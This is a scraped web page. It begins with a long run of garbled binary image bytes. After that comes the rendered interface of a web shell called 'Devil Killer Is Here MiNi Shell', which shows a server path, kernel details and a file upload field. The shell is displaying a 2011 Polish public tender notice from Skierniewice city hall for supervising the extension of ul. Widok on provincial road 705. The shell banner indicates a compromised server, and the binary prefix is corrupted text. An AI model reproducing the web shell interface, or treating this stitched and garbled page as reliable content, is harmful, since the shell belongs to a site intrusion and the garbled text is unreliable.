JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111228/439924-N-2011.html

<p class="kh_header"><b>Skierniewice: Pełnienie nadzoru inwestorskiego nad  realizacją zadania pn. Rozbudowa ul. Widok od ul. Siennej do ul. Skłodowskiej w ciągu drogi wojewódzkiej nr 705</b><br>
<b>Numer ogłoszenia: 439924 - 2011; data zamieszczenia: 28.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Skierniewice , ul. Rynek 1, 96-100 Skierniewice, woj. łódzkie, tel. 046 8345100, faks 046 8345151.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.skierniewice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego nad  realizacją zadania pn. Rozbudowa ul. Widok od ul. Siennej do ul. Skłodowskiej w ciągu drogi wojewódzkiej nr 705.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest Pełnienie nadzoru inwestorskiego nad  realizacją zadania pn. Budowa ul. Widok od ul. Siennej do ul. Skłodowskiej w ciągu drogi wojewódzkiej nr 705, które będzie zlecane do realizacji zgodnie z ustawą Prawo zamówień publicznych - przewiduje się, że głównym trybem wyboru wykonawcy robót budowlanych będzie przetarg nieograniczony. Nadzór inwestorski nad robotami budowlanymi w branżach: drogowa, sanitarna, elektryczna, telekomunikacyjna.
Zakres planowanych robót obejmuje:
-	roboty rozbiórkowe istniejących nawierzchni i elementów drogowych (nawierzchni, podbudów,        krawężników, obrzeży itp.),
-	roboty ziemne, ścięcie drzew i karczowanie pni,
-	wykonanie podbudowy i nawierzchni jezdni ulicy, zatok autobusowych, zjazdów, ścieżki pieszo-       rowerowej, chodników, opasek, wysp dzielących itp.,   
-	wykonanie oznakowania pionowego i poziomego,
-	wykonanie kanalizacji deszczowej dł. ok. 650 m, z przykanalikami i wpustami dł. ok. 150 m, 
-	wykonanie kanalizacji sanitarnej dł. ok. 140 m, z przykanalikami dł. ok. 65 m,
-	przebudowa wodociągu - dł. ok. 75 m,
-	budowa oświetlenia ulicznego - dł. ok. 700 m,
-	przebudowa linii energetycznej napowietrznej z przyłączami - dł. ok. 215 m ,
-	przebudowa i budowa sieci telekomunikacyjnej - dł. ok. 110 m,
-	rozbiórka, przeniesienie i powtórna budowa kapliczki,
-	rozbiórka i budowa podpór ciepłociągu.

Szczegółowy opis robót budowlanych został zawarty w dokumentacjach projektowych na wykonanie zadania pn. Rozbudowa ul. Widok od ul. Siennej do ul. Skłodowskiej w ciągu drogi wojewódzkiej nr 705 oraz w Specyfikacjach Technicznych, które są dostępne w Wydziale Dróg i Komunikacji Urzędu Miasta Skierniewice przy ul. Floriana 9 w pokoju nr 12.

2.  W ramach niniejszego zamówienia inspektor nadzoru zobowiązuje się do:

2.1. Reprezentowania Zamawiającego - Inwestora na budowie przez sprawowanie kontroli zgodności 	jej realizacji z dokumentacją projektową, specyfikacjami technicznymi, pozwoleniem na 	budowę, przepisami oraz zasadami wiedzy technicznej,
2.2. Współpracy z projektantem, w tym do egzekwowania usunięcia ewentualnych usterek                   	w dokumentacji projektowej,
2.3. Przygotowywanie, sporządzanie i dostarczanie dla Zamawiającego wszelkich informacji i opinii, 	dokumentów związanych z realizacją inwestycji w tym z zakresu rzeczowo-finansowego, a także 	bieżącej kontroli zgodności wykonywanych prac z harmonogramem rzeczowo-finansowym robót
2.4. Podejmowania działań w celu dotrzymania terminu realizacji budowy,
2.5. Nadzorowanie wypełniania warunków umowy zawartej pomiędzy zamawiającym a wykonawcą robót,
2.6. Podejmowania decyzji o dopuszczeniu do stosowania (lub odrzuceniu) receptur, materiałów, 	prefabrykatów - w tym mieszanek mineralno-bitumicznych, betonów do wszystkich elementów, 	sprzętu i urządzeń przewidzianych do realizacji robót w oparciu o przepisy, normy i wymagania 	sformułowane w umowie z wykonawcą robót, w dokumentacji projektowej i specyfikacjach 	technicznych,
2.7. Przeprowadzania kontroli laboratorium wykonawcy w celu sprawdzenia, czy stosowane 	urządzenia pomiarowe i sprzęt laboratoryjny wykonawcy posiadają ważną legalizację, zostały 	prawidłowo wykalibrowanie i odpowiadają wymogom norm określających procedurę badań, 	uczestniczenia w badaniach przeprowadzanych w tym laboratorium przez wykonawcę w czasie 	trwania budowy,
2.8. Zatwierdzania materiałów, technologii budowlanych oraz jakości wykonania zgodnie z warunkami 	umów i dokumentacją projektową dla wszystkich asortymentów robót,
2.9. Sprawdzania jakości wykonywanych robót, wbudowanych wyrobów budowlanych,  	a w szczególności zapobiegania zastosowania wyrobów budowlanych wadliwych i nie 	dopuszczonych do obrotu i stosowania w budownictwie, kontroli i archiwizacji dokumentów 	potwierdzających dopuszczenie tych materiałów do obrotu,
2.10. Sprawdzania i odbioru robót budowlanych ulegających zakryciu lub zanikających, uczestniczenia 	w próbach i odbiorach technicznych sieci i urządzeń technicznych
2.11. Wydawania kierownikowi budowy lub kierownikom robót poleceń potwierdzonych wpisem do 	dziennika budowy dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub 	badań, 	także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienie 	ekspertyz 	dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do 	obrotu i stosowania     w budownictwie wyrobów budowlanych i urządzeń 	technicznych,
2.12. Żądania od kierownika budowy lub kierowników robót dokonania poprawek bądź ponownego 	wykonania wadliwie wykonanych robót,
2.13. Kontrolowania jakości i terminowości wykonywanych robót:
-	kontrolowanie prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót
-	uczestniczenie w dokonywaniu odbiorów częściowych inwestycji,
-	przygotowanie zadania inwestycyjnego do odbioru końcowego - sprawdzenie i zatwierdzenie dokumentacji powykonawczej (operatu kolaudacyjnego), w tym powykonawczej dokumentacji geodezyjnej,
-	sprawdzanie faktur wykonawcy oraz dokumentów załączonych do rozliczenia robót,
-	dokonywanie rozliczeń merytorycznych i finansowych wykonanych prac w imieniu Zamawiającego,a także sporządzenie pełnego rozliczenia finansowego nadzorowanej inwestycji,
-	dokonanie odbioru inwestycji po upływie terminu gwarancji ustalonego w umowie z wykonawcą robót budowlanych,
-	uczestnictwo w komisjach do stwierdzenia ewentualnych wad w okresie rękojmi oraz nadzór nad naprawami wad ujawnionych w okresie rękojmi i gwarancji.
2.14. Inspektor nadzoru zobowiązany jest do składania sprawozdań tygodniowych i miesięcznych 	postępu robót
	W sprawozdaniu należy przedstawić:
a)	szczegółowy wykaz robót wykonanych w okresie sprawozdawczym oraz narastająco od początku budowy,

b)	informację o napotkanych problemach i podjętych działaniach zaradczych mających na celu ich przezwyciężenie (wczesne ostrzeganie zwłaszcza w sprawach mogących wpłynąć na termin zakończenia robót)
2.15. Niezależnie od składania sprawozdań Inspektor nadzoru będzie informował na bieżąco 	Zamawiającego o przebiegu prac i ewentualnych zagrożeniach w realizacji inwestycji.
2.16. Inspektor nadzoru zobowiązany jest do nadzorowania budowy w takich odstępach czasu, aby 	była skuteczność nadzoru ,jednak nie rzadziej niż min. 3 razy w tygodniu oraz na każde żądanie 	Zamawiającego - Inwestora w sytuacjach wyjątkowych niezwłocznie, gdy obecność inspektora 	nadzoru będzie nieodzowna najpóźniej w przeciągu 3 godzin.
	Każdorazowy pobyt na placu budowy winien być potwierdzony wpisem do dziennika budowy.
2.17. Inspektor nadzoru zobowiązany jest posiadać telefon komórkowy i samochód do dyspozycji.

Pełen zakres czynności określonych w Ustawie z dnia 7 lipca 1994 roku Prawo budowlane - (tekst jednolity Dz.U. z 2006r. Nr 156, poz. 1217) 
Pełnienie funkcji koordynatora inspektorów nadzoru w przypadku występowania innych branż przy realizacji inwestycji - zgodnie z art. 27 w/w ustawy Prawo budowlane.
Zamówienie będzie wykonywane w okresie od podpisania umowy w sprawie pełnienia nadzoru inwestorskiego oraz złożenia oświadczenia o podjęciu nadzoru inwestorskiego do zakończenia robót, przez które rozumie się łączne spełnienie następujących warunków: dokonanie przez Inwestora odbioru końcowego, rozliczenie robót fakturą końcową.
Inspektor nadzoru jest tez zobowiązany do wzięcia udziału w odbiorze pogwarancyjnym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do udzielonego zamówienia podstawowego, o których mowa w art. 67 ust.1 pkt 6, polegających na zwiększeniu ilości wykonywanych czynności nadzoru inwestorskiego , będących wynikiem zwiększenia zakresów nadzorowanych robót  budowlanych .</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości :                   2 269,00 zł
2. Wadium powinno być wniesione najpóźniej w terminie do 12.01.2012 r. do godziny 11.30
3. Wadium może być wniesione w formach przewidzianych w art. 45. ust. 6. Ustawy.
4. Wadium w pieniądzu należy wpłacić na rachunek bankowy o nr konta: KREDYT BANK S.A. oddział w Skierniewicach nr 42 1500 1689 1216 8004 0851 0000 z dopiskiem: RZP - wadium do przetargu pn. Pełnienie nadzoru inwestorskiego nad  realizacją zadania pn. Rozbudowa ul. Widok od ul. Siennej do ul. Skłodowskiej w ciągu drogi wojewódzkiej nr 705.
5. Zamawiający będzie przechowywał wadium wniesione w pieniądzu na rachunku bankowym i jego 	zwrot nastąpi zgodnie z art.46 ust. 4 ustawy.
6. Wadium w innych dopuszczonych formach należy wnieść w kasie Urzędu Miasta Skierniewice.
7. Zwrot wadium nastąpi w przypadkach i na warunkach przewidzianych w art. 46 Ustawy.
8. Zamawiający zatrzyma wadium wraz z odsetkami w przypadkach przewidzianych w art. 46 ust. 4a
i 5 ustawy.
9. Wadium należy wnieść na okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone  w art. 22 ust. 1 pkt. 1 ustawy PZP, dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich     posiadania oraz wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 ustawy oraz spełniają warunki zawarte w  SIWZ oraz dostarczą oświadczenia i dokumenty 	wymagane przez Zamawiającego. Na dowód tego Wykonawca winien załączyć do oferty oświadczenia -załącznik nr 3 i 3a do SIWZ oraz dokumenty wymagane w SIWZ. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunek określony w art. 22 ust. 1 pkt. 2 ustawy PZP dotyczący posiadania wiedzy               	i doświadczenia. Zamawiający uzna za spełniony warunek, jeżeli Wykonawcy złożą oświadczenie - załacznik nr 3 oraz wykażą, że wykonali 	w ciągu 	ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia 	działalności jest krótszy w tym okresie, co najmniej dwie usługi polegające na sprawowaniu 	nadzoru nad robotami budowlanymi polegającymi na przebudowie, rozbudowie lub budowie 	drogi o wartości nie mniejszej niż 100 000,- zł brutto każda  ( słownie : sto  tysięcy  złotych),   a 	wartość każdej z tych robót budowlanych wynosiła nie mniej niż 5 000 000,-zł brutto (słownie: pięć  	milionów złotych).	
Wykonawca winien załączyć do oferty wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również 	wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i 	doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli 	okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, 	przedmiotu, dat wykonania                  i odbiorców - zgodnie z załącznikiem nr 7 wraz z 	dokumentami potwierdzającymi, że te  usługi zostały wykonane lub są wykonywane należycie; Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunek określony w art. 22 ust. 1 pkt 3 ustawy PZP dotyczący dysponowania 	odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; Wykonawca winien złożyć oświadczenie - załacznik nr 3.
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunek określony w art. 22 ust. 1 pkt 3 ustawy PZP dotyczący dysponowania 	odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; W zakresie 	osób zdolnych do wykonania zamówienia wymagane jest wykazanie osoby lub osób  posiadających 	uprawnienia do kierowania i nadzorowania robotami budowlanymi  w specjalnościach:
	- drogowej,
	- instalacyjnej w zakresie sieci wodociągowych,  kanalizacyjnych,  ciepłowniczych
	- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i energetycznych,
-	telekomunikacyjnej,
-	konstrukcyjnej
Na dowód tego wykonawca załączy do oferty załacznik nr 3 oraz:
- Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat 	ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania 	zamówienia,     a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie 	do dysponowania tymi osobami - wg załącznika nr 5.

- Oświadczenie na podstawie załącznika nr 6 informujące, że osoby wyznaczone do kierowania 	budową oraz robotami posiadają niezbędne uprawnienia. 
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunek określony w art. 22 ust. 1 pkt 4 ustawy PZP, dotyczący sytuacji ekonomicznej          	i finansowej; Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca przedstawi 	opłaconą polisę OC w zakresie prowadzonej działalności, a w przypadku jej braku inny dokument 	potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie pro	wadzonej działalności, związanej z przedmiotem zamówienia w wysokości minimum  100 000,-  zł 	(słownie: sto tysięcy złotych). W celu potwierdzenia spełnienia warunku znajdowania się przez Wykonawcę w sytuacji 	ekonomicznej i finansowej zapewniającej wykonanie zamówienia - polisa, a w przypadku jej braku 	inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w 	zakresie prowadzonej działalności gospodarczej na co najmniej 100 000,-zł (słownie: sto tysięcy 	złotych). Ocena spełniania warunku wymaganego od Wykonawcy zostanie dokonana wg formuły  spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oferta wykonawcy - wg wzoru stanowiącego załącznik nr 1 do SIWZ
2. Oświadczenie o spełnianiu warunków udziału w postępowaniu zawartych w art. 22, ust. 1 Ustawy - wg wzoru stanowiącego załącznik nr 3 do SIWZ 
a)	Oferent korzystający z własnego potencjału technicznego i osobowego wykreśla punkt 3 i 4 załącznika nr 2 natomiast w załącznikach 3 i 4 wpisuje: 
NIE DOTYCZY
b)	Oferent nie korzystający z własnego potencjału technicznego i osobowego wykreśla punkt 2 załącznika nr 2, a zarazem wypełnia załącznik nr 3
3. Oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy - wg wzoru 	stanowiącego załącznik nr 3a do SIWZ,
4.  Informację dotyczącą podwykonawców i zakresu robót, który wykonawca zamierza im powierzyć 	- wg zał. 4. Jeśli wykonawca nie będzie korzystał z podwykonawców wówczas w załączniku nr 4 	wpisuje Nie Dotyczy.
5.Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat 	ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania 	zamówienia,     a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie 	do dysponowania tymi osobami - wg załącznika nr 5.
6. Oświadczenie na podstawie załącznika nr 6 informujące, że osoby wyznaczone do kierowania 	budową oraz robotami posiadają niezbędne uprawnienia. 
